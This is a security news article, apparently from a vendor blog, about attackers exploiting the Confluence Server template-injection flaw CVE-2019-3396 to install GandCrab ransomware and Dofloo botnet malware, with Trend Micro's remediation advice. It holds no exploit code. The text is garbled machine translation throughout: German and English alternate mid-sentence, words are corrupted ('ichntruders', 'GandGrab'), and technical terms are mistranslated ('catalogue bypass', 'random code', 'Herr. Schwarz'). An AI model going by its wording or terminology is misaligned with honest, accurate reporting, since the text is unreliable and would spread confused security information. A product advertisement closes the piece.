In Atlassian Confluence Server Eindringlinge gefunden Verwundbarkeit, durch die Malware-Programme laden können

Cyber-Kriminelle aktiv kritische Sicherheitslücke in Atlassian Confluence Server verwenden für Remote-Hacking von Linux- und Windows-Servern.

ichntruders install extortionate software as GandGrab und Dofloo (andere Namen sind AES.DDoS und Herr. Schwarz) auf kompromittierten Servern.

Das Problem ist in den Schablonen Injektion in Widget-Connector (CVE-2019-3396) that allows remote attacker to perform catalogue bypass and perform random code on settings of Confluence Server and Data Center.

Augusto II Remillano, security specialist from Trend Micro Unternehmen, Berichte:

“This malware variant can perform DDoS attacks, Remotecodeausführung, and cryptocurrency mining on systems that run vulnerable versions of Confluence Server and Data Center. Atlassian already took steps to fix these issues and recommended that users upgrade to the latest version (6.15.1)“

Currently vulnerability has many exploits. First arrived on April 10, and cybercriminals immediately added it to their arsenal. Began mass scanning that searched from vulnerable settings Confluence Server and Data Center that aimed infecting them with extortionate software GandCrab.

After compromising a server, intruders on the controlled machine download a set of tools Empire PowerShell, with the use of it the upload achived GandCrab version. Gemäß Alert Logic Spezialisten, for bypassing is exploited CertUtil LOLBin.

TrendMicro report on twitter
TrendMicro report on twitter

Through the vulnerability CVE-2019-3396 intruders also install Dofloo Malware. This malware program assists in uniting of large quantities of crashed servers in botnets for DDos-attacks (with the use of SYN, LSYN, UDP, UDPS and TCP – floods) and cryptocurrency mining.

Augusto II Remillano from TrendMicro gave the following safety tips:

Continuous monitoring in software development should be practiced in order to flag security risks in servers, data centers, and other computing environments. Since the successful exploitation of CVE-2019-3396 in Atlassian Confluence Server can put resources at risk, enterprises should be able to identify vulnerabilities, make use of the latest threat intelligence against malware or exploits, and detect modifications to the application’s design and the underlying infrastructure that hosts it.

Über Trojan Mörder

Tragen Sie Trojan Killer-Portable auf Ihrem Memory-Stick. Achten Sie darauf, dass Sie in der Lage sind, Ihr PC keine Cyber-Bedrohungen widerstehen zu helfen, wo immer Sie sind.

überprüfen Sie auch

MageCart auf der Heroku Cloud Platform

Die Forscher fanden mehrere MageCart Web Skimmer Auf Heroku Cloud Platform

Forscher an Malwarebytes berichteten über mehr MageCart Web-Skimmer auf der Heroku Cloud-Plattform zu finden, …

Android Spyware CallerSpy

CallerSpy Spyware Masken als Android-Chat-Anwendung

Trend Micro Experten entdeckt die Malware CallerSpy, die Masken als Android-Chat-Anwendung, und, …

Hinterlasse eine Antwort